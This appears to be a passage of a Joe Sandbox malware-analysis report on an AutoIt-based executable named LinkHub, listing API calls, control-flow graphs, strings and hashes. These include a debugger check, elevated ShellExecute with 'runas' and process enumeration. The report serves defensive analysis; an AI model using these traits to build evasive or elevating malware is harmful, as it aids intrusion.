                                                                    • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00246175
                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0024617C
                                                                    • GetSystemInfo.KERNEL32(?,?,?), ref: 002461A1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                    • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                    • API String ID: 3290436268-3101561225
                                                                    • Opcode ID: f38bf59ff0ee966a7daef0c4a9e2df28e6fb814e5496be4974286de2e1191d70
                                                                    • Instruction ID: 50a68b047e85bf0fcb4e44f82879f6d47631b4020e18bb6758f9cfee5486333d
                                                                    • Opcode Fuzzy Hash: f38bf59ff0ee966a7daef0c4a9e2df28e6fb814e5496be4974286de2e1191d70
                                                                    • Instruction Fuzzy Hash: 62A1822D92A6D4CFC717DB687C491D77F586B2F300F08DC9AE46893262C6694978CB32

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00243368,?), ref: 002433BB
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00243368,?), ref: 002433CE
                                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,00312418,00312400,?,?,?,?,?,?,00243368,?), ref: 0024343A
                                                                      • Part of subcall function 00248577: _wcslen.LIBCMT ref: 0024858A
                                                                      • Part of subcall function 0024425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00243462,00312418,?,?,?,?,?,?,?,00243368,?), ref: 002442A0
                                                                    • SetCurrentDirectoryW.KERNEL32(?,00000001,00312418,?,?,?,?,?,?,?,00243368,?), ref: 002434BB
                                                                    • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00283CB0
                                                                    • SetCurrentDirectoryW.KERNEL32(?,00312418,?,?,?,?,?,?,?,00243368,?), ref: 00283CF1
                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,003031F4,00312418,?,?,?,?,?,?,?,00243368), ref: 00283D7A
                                                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 00283D81
                                                                      • Part of subcall function 002434D3: GetSysColorBrush.USER32(0000000F), ref: 002434DE
                                                                      • Part of subcall function 002434D3: LoadCursorW.USER32(00000000,00007F00), ref: 002434ED
                                                                      • Part of subcall function 002434D3: LoadIconW.USER32(00000063), ref: 00243503
                                                                      • Part of subcall function 002434D3: LoadIconW.USER32(000000A4), ref: 00243515
                                                                      • Part of subcall function 002434D3: LoadIconW.USER32(000000A2), ref: 00243527
                                                                      • Part of subcall function 002434D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0024353F
                                                                      • Part of subcall function 002434D3: RegisterClassExW.USER32(?), ref: 00243590
                                                                      • Part of subcall function 002435B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002435E1
                                                                      • Part of subcall function 002435B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00243602
                                                                      • Part of subcall function 002435B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00243368,?), ref: 00243616
                                                                      • Part of subcall function 002435B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00243368,?), ref: 0024361F
                                                                      • Part of subcall function 0024396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00243A3C
                                                                    Strings
                                                                    • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00283CAA
                                                                    • AutoIt, xrefs: 00283CA5
                                                                    • 0$1, xrefs: 00243495
                                                                    • runas, xrefs: 00283D75
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                    • String ID: 0$1$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                    • API String ID: 683915450-1662432272
                                                                    • Opcode ID: de2d4db83ecb5bb91e85643d43496d2180a2c6f6d2e5199249171cf8cc40a40d
                                                                    • Instruction ID: 47d1a924f6bc64858241eaf19e1ccde6119e51d7cbf77785b355d902abf37b3b
                                                                    • Opcode Fuzzy Hash: de2d4db83ecb5bb91e85643d43496d2180a2c6f6d2e5199249171cf8cc40a40d
                                                                    • Instruction Fuzzy Hash: 5C512674619341AED70BFF609C15DEF7BA8AF89700F00442DF591521A2DF208A79CF22
                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 002ADDAC
                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 002ADDBA
                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 002ADDDA
                                                                    • CloseHandle.KERNELBASE(00000000), ref: 002ADE87
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                    • String ID:
                                                                    • API String ID: 420147892-0
                                                                    • Opcode ID: 5a9d5e310ff105931adf7e9769f6a7700c2195401cbb71e8bb93eae9380b6822
                                                                    • Instruction ID: fe5a1721b46b35119397131effcee54a703602cc1a834d7e88047ddcce2ea834
                                                                    • Opcode Fuzzy Hash: 5a9d5e310ff105931adf7e9769f6a7700c2195401cbb71e8bb93eae9380b6822
                                                                    • Instruction Fuzzy Hash: 7631AD72418301AFC305EF60D885AAFBBE8EF99340F00092DF586871A1EB71D959CF92
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00000003,?,0026502E,00000003,003098D8,0000000C,00265185,00000003,00000002,00000000,?,00272C59,00000003), ref: 00265079
                                                                    • TerminateProcess.KERNEL32(00000000,?,0026502E,00000003,003098D8,0000000C,00265185,00000003,00000002,00000000,?,00272C59,00000003), ref: 00265080
                                                                    • ExitProcess.KERNEL32 ref: 00265092
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CurrentExitTerminate
                                                                    • String ID:
                                                                    • API String ID: 1703294689-0
                                                                    • Opcode ID: ed728e5b1101afc3eb0355cd43a31258ec1a761c9ee246e39a682aa3b1c0d3de
                                                                    • Instruction ID: 47f32dff9e82dbba3f4f672adfee7439d771a67c7f95346d1a2ae80716ebe538
                                                                    • Opcode Fuzzy Hash: ed728e5b1101afc3eb0355cd43a31258ec1a761c9ee246e39a682aa3b1c0d3de
                                                                    • Instruction Fuzzy Hash: F1E08C31422908AFCF216F64ED0CE483B69EF14381F004014F8098A131DB3ADDA2CFC0

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 25ac3e-25b063 call 248ec0 call 25bc58 call 24e6a0 7 25b069-25b073 0->7 8 298584-298591 0->8 11 29896b-298979 7->11 12 25b079-25b07e 7->12 9 298593 8->9 10 298596-2985a5 8->10 9->10 13 2985aa 10->13 14 2985a7 10->14 15 29897b 11->15 16 29897e 11->16 17 25b084-25b090 call 25b5b6 12->17 18 2985b2-2985b4 12->18 13->18 14->13 15->16 20 298985-29898e 16->20 24 2985bd 17->24 25 25b096-25b0a3 call 24c98d 17->25 18->24 22 298990 20->22 23 298993 20->23 22->23 28 29899c-2989eb call 24e6a0 call 25bbbe * 2 23->28 27 2985c7 24->27 32 25b0ab-25b0b4 25->32 33 2985cf-2985d2 27->33 62 25b1e0-25b1f5 28->62 63 2989f1-298a03 call 25b5b6 28->63 37 25b0b8-25b0d6 call 264d98 32->37 34 2985d8-298600 call 264cd3 call 247ad5 33->34 35 25b158-25b16f 33->35 74 29862d-298651 call 247b1a call 24bd98 34->74 75 298602-298606 34->75 40 25b175 35->40 41 298954-298957 35->41 56 25b0e5 37->56 57 25b0d8-25b0e1 37->57 45 2988ff-298920 call 24e6a0 40->45 46 25b17b-25b17e 40->46 47 29895d-298960 41->47 48 298a41-298a79 call 24e6a0 call 25bbbe 41->48 45->62 79 298926-298938 call 25b5b6 45->79 53 298729-298743 call 25bbbe 46->53 54 25b184-25b187 46->54 47->28 55 298962-298965 47->55 48->62 98 298a7f-298a91 call 25b5b6 48->98 83 298749-29874c 53->83 84 29888f-2988b5 call 24e6a0 53->84 64 2986ca-2986e0 call 246c03 54->64 65 25b18d-25b190 54->65 55->11 55->62 56->27 68 25b0eb-25b0fc 56->68 57->37 66 25b0e3 57->66 69 298ac9-298acf 62->69 70 25b1fb-25b20b call 24e6a0 62->70 103 298a2f-298a3c call 24c98d 63->103 104 298a05-298a0d 63->104 64->62 101 2986e6-2986fc call 25b5b6 64->101 77 25b196-25b1b8 call 24e6a0 65->77 78 298656-298659 65->78 66->68 68->11 80 25b102-25b11c 68->80 69->32 86 298ad5 69->86 74->78 75->74 88 298608-29862b call 24ad40 75->88 77->62 119 25b1ba-25b1cc call 25b5b6 77->119 78->11 81 29865f-298674 call 246c03 78->81 122 29893a-298943 call 24c98d 79->122 123 298945 79->123 80->33 93 25b122-25b154 call 25bbbe call 24e6a0 80->93 81->62 126 29867a-298690 call 25b5b6 81->126 96 2987bf-2987de call 24e6a0 83->96 97 29874e-298751 83->97 84->62 130 2988bb-2988cd call 25b5b6 84->130 86->11 88->74 88->75 93->35 96->62 148 2987e4-2987f6 call 25b5b6 96->148 109 298ada-298ae8 97->109 110 298757-298774 call 24e6a0 97->110 144 298a93-298a9b 98->144 145 298ab5-298abe call 24c98d 98->145 149 29870d-298716 call 248ec0 101->149 150 2986fe-29870b call 248ec0 101->150 140 298ac2-298ac4 103->140 117 298a0f-298a13 104->117 118 298a1e-298a29 call 24b4b1 104->118 133 298aea 109->133 134 298aed-298afd 109->134 110->62 157 29877a-29878c call 25b5b6 110->157 117->118 136 298a15-298a19 117->136 118->103 165 298b0b-298b19 118->165 166 2986ba-2986c3 call 24c98d 119->166 167 25b1d2-25b1de 119->167 127 298949-29894f 122->127 123->127 168 29869d-2986ab call 248ec0 126->168 169 298692-29869b call 24c98d 126->169 127->62 172 2988cf-2988dc call 24c98d 130->172 173 2988de 130->173 133->134 151 298aff 134->151 152 298b02-298b06 134->152 153 298aa1-298aa3 136->153 140->62 158 298aa8-298ab3 call 24b4b1 144->158 159 298a9d 144->159 145->140 148->62 188 2987fc-298805 call 25b5b6 148->188 189 298719-298724 call 248577 149->189 150->189 151->152 152->70 153->62 192 29879f 157->192 193 29878e-29879d call 24c98d 157->193 158->145 158->165 159->153 178 298b1b 165->178 179 298b1e-298b21 165->179 166->64 167->62 199 2986ae-2986b5 168->199 169->199 187 2988e2-2988e9 172->187 173->187 178->179 179->20 195 2988eb-2988f0 call 24396b 187->195 196 2988f5 call 243907 187->196 210 298818 188->210 211 298807-298816 call 24c98d 188->211 189->62 201 2987a3-2987ae call 269334 192->201 193->201 195->62 209 2988fa 196->209 199->62 201->11 217 2987b4-2987ba 201->217 209->62 212 29881c-29883f 210->212 211->212 215 29884d-298850 212->215 216 298841-298848 212->216 219 298860-298863 215->219 220 298852-29885b 215->220 216->215 217->62 221 298873-298876 219->221 222 298865-29886e 219->222 220->219 221->62 223 29887c-29888a 221->223 222->221 223->62
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4-$@-$P-$`*1$`-$d0b$d10m0$d1b$d1r0,2$d5m0$e#1$i$t-$t-$(1$(1$(1$(1$-$-
                                                                    • API String ID: 0-2143753235
                                                                    • Opcode ID: 143eabe10cb961704828efb5d5b6a74f4c8c42bc953a858918ee892f7b57d32a
                                                                    • Instruction ID: fa63ffc97983c2e692ceec295aa7605be17c234a09243d1b2b69ebea4010ad9b
                                                                    • Opcode Fuzzy Hash: 143eabe10cb961704828efb5d5b6a74f4c8c42bc953a858918ee892f7b57d32a
                                                                    • Instruction Fuzzy Hash: 5D627B74528741CFC729DF24C084AAABBE1FF89304F14895EE8998B351DB71D969CF82

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00243657
                                                                    • RegisterClassExW.USER32(00000030), ref: 00243681
                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00243692
                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 002436AF
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002436BF
                                                                    • LoadIconW.USER32(000000A9), ref: 002436D5
                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002436E4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                    • String ID: +$0$0+m"$$AutoIt v3 GUI$TaskbarCreated
                                                                    • API String ID: 2914291525-531287656
                                                                    • Opcode ID: 8849a24287aaef85676ca10cb19a17705e7ca0b537977260fb39fa5b06b7b4d5
                                                                    • Instruction ID: 57a2709fc9aca52db6310b4d2514c514a11fb66c811cce56041b11acb4077840
                                                                    • Opcode Fuzzy Hash: 8849a24287aaef85676ca10cb19a17705e7ca0b537977260fb39fa5b06b7b4d5
                                                                    • Instruction Fuzzy Hash: 53210BB5D12708AFDB01DFA4EC49BDEBBB8FB08710F00811AF511A62A0D7B44964CF90

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 356 24370f-243724 357 243784-243786 356->357 358 243726-243729 356->358 357->358 361 243788 357->361 359 24378a 358->359 360 24372b-243732 358->360 365 243790-243795 359->365 366 283df4-283e1c call 242f92 call 25f23c 359->366 362 243804-24380c PostQuitMessage 360->362 363 243738-24373d 360->363 364 24376f-243777 DefWindowProcW 361->364 371 2437b8-2437ba 362->371 367 243743-243747 363->367 368 283e61-283e75 call 2ac8f7 363->368 370 24377d-243783 364->370 372 243797-24379a 365->372 373 2437bc-2437e3 SetTimer RegisterWindowMessageW 365->373 402 283e21-283e28 366->402 376 24374d-243752 367->376 377 24380e-24381d call 25fcad 367->377 368->371 395 283e7b 368->395 371->370 374 2437a0-2437b3 KillTimer call 243907 call 2459ff 372->374 375 283d95-283d98 372->375 373->371 378 2437e5-2437f0 CreatePopupMenu 373->378 374->371 387 283d9a-283d9e 375->387 388 283dd0-283def MoveWindow 375->388 382 243758-24375d 376->382 383 283e46-283e4d 376->383 377->371 378->371 393 2437f2-243802 call 24381f 382->393 394 243763-243769 382->394 383->364 392 283e53-283e5c call 2a1423 383->392 389 283dbf-283dcb SetFocus 387->389 390 283da0-283da3 387->390 388->371 389->371 390->394 398 283da9-283dba call 242f92 390->398 392->364 393->371 394->364 394->402 395->364 398->371 402->364 406 283e2e-283e41 call 243907 call 24396b 402->406 406->364
                                                                    APIs
                                                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00243709,?,?), ref: 00243777
                                                                    • KillTimer.USER32(?,00000001,?,?,?,?,?,00243709,?,?), ref: 002437A3
                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 002437C6
                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00243709,?,?), ref: 002437D1
                                                                    • CreatePopupMenu.USER32 ref: 002437E5
                                                                    • PostQuitMessage.USER32(00000000), ref: 00243806
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                    • String ID: 0$1$0$1$TaskbarCreated
                                                                    • API String ID: 129472671-1916145205
                                                                    • Opcode ID: 2ac78297c546fef2bbae43dc29a72584eacc90edae3d793e40513d997084fb63
                                                                    • Instruction ID: d7b8caae57df72d2f8256b4fe6e31e2f06fff9e8e517735343e0e985e29177a8
                                                                    • Opcode Fuzzy Hash: 2ac78297c546fef2bbae43dc29a72584eacc90edae3d793e40513d997084fb63
                                                                    • Instruction Fuzzy Hash: 5B41E6F9230146BBDB1DAF2C9C4DBFABA69EB09710F004125F98185191DAB89F748761

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 412 2809db-280a0b call 2807af 415 280a0d-280a18 call 26f636 412->415 416 280a26-280a32 call 275594 412->416 421 280a1a-280a21 call 26f649 415->421 422 280a4b-280a94 call 28071a 416->422 423 280a34-280a49 call 26f636 call 26f649 416->423 433 280cfd-280d03 421->433 431 280b01-280b0a GetFileType 422->431 432 280a96-280a9f 422->432 423->421 434 280b0c-280b3d GetLastError call 26f613 CloseHandle 431->434 435 280b53-280b56 431->435 437 280aa1-280aa5 432->437 438 280ad6-280afc GetLastError call 26f613 432->438 434->421 449 280b43-280b4e call 26f649 434->449 440 280b58-280b5d 435->440 441 280b5f-280b65 435->441 437->438 442 280aa7-280ad4 call 28071a 437->442 438->421 445 280b69-280bb7 call 2754dd 440->445 441->445 446 280b67 441->446 442->431 442->438 455 280bb9-280bc5 call 28092b 445->455 456 280bc7-280beb call 2804cd 445->456 446->445 449->421 455->456 461 280bef-280bf9 call 278a2e 455->461 462 280bed 456->462 463 280bfe-280c41 456->463 461->433 462->461 465 280c62-280c70 463->465 466 280c43-280c47 463->466 469 280cfb 465->469 470 280c76-280c7a 465->470 466->465 468 280c49-280c5d 466->468 468->465 469->433 470->469 471 280c7c-280caf CloseHandle call 28071a 470->471 474 280cb1-280cdd GetLastError call 26f613 call 2756a6 471->474 475 280ce3-280cf7 471->475 474->475 475->469
                                                                    APIs
                                                                      • Part of subcall function 0028071A: CreateFileW.KERNELBASE(00000000,00000000,?,00280A84,?,?,00000000,?,00280A84,00000000,0000000C), ref: 00280737
                                                                    • GetLastError.KERNEL32 ref: 00280AEF
                                                                    • __dosmaperr.LIBCMT ref: 00280AF6
                                                                    • GetFileType.KERNELBASE(00000000), ref: 00280B02
                                                                    • GetLastError.KERNEL32 ref: 00280B0C
                                                                    • __dosmaperr.LIBCMT ref: 00280B15
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00280B35
                                                                    • CloseHandle.KERNEL32(?), ref: 00280C7F
                                                                    • GetLastError.KERNEL32 ref: 00280CB1
                                                                    • __dosmaperr.LIBCMT ref: 00280CB8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                    • String ID: H
                                                                    • API String ID: 4237864984-2852464175
                                                                    • Opcode ID: d9f548b53ac64f9a98b01e572418baf0d6d7dedf16afb41723f6372de9ad7b4b
                                                                    • Instruction ID: 0610a2f44fcdcd4c10fa4cd917e2084a54b808c82e4b5120634952dee99c35c5
                                                                    • Opcode Fuzzy Hash: d9f548b53ac64f9a98b01e572418baf0d6d7dedf16afb41723f6372de9ad7b4b
                                                                    • Instruction Fuzzy Hash: 39A15836A211098FDF29EF78D892BAD7BA4EB0A324F144159F811DB2D1C7319C26CB51

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 00245594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00284B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 002455B2
                                                                      • Part of subcall function 00245238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0024525A
                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 002453C4
                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00284BFD
                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00284C3E
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00284C80
                                                                    • _wcslen.LIBCMT ref: 00284CE7
                                                                    • _wcslen.LIBCMT ref: 00284CF6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                    • API String ID: 98802146-2727554177
                                                                    • Opcode ID: efd9b7a62317ff887427289f3d4df79567203cd90ab166f312914e305a0c31a3
                                                                    • Instruction ID: 2f5cc9c1056b68a2e25fc45b75198cc096bb3c7a29ecc9509df945177f829f4e
                                                                    • Opcode Fuzzy Hash: efd9b7a62317ff887427289f3d4df79567203cd90ab166f312914e305a0c31a3
                                                                    • Instruction Fuzzy Hash: E871AE755253019BC305EF25EC819EABBECFF89340F80482EF454831A0DB719A68CF56

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 002434DE
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 002434ED
                                                                    • LoadIconW.USER32(00000063), ref: 00243503
                                                                    • LoadIconW.USER32(000000A4), ref: 00243515
                                                                    • LoadIconW.USER32(000000A2), ref: 00243527
                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0024353F
                                                                    • RegisterClassExW.USER32(?), ref: 00243590
                                                                      • Part of subcall function 00243624: GetSysColorBrush.USER32(0000000F), ref: 00243657
                                                                      • Part of subcall function 00243624: RegisterClassExW.USER32(00000030), ref: 00243681
                                                                      • Part of subcall function 00243624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00243692
                                                                      • Part of subcall function 00243624: InitCommonControlsEx.COMCTL32(?), ref: 002436AF
                                                                      • Part of subcall function 00243624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002436BF
                                                                      • Part of subcall function 00243624: LoadIconW.USER32(000000A9), ref: 002436D5
                                                                      • Part of subcall function 00243624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002436E4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
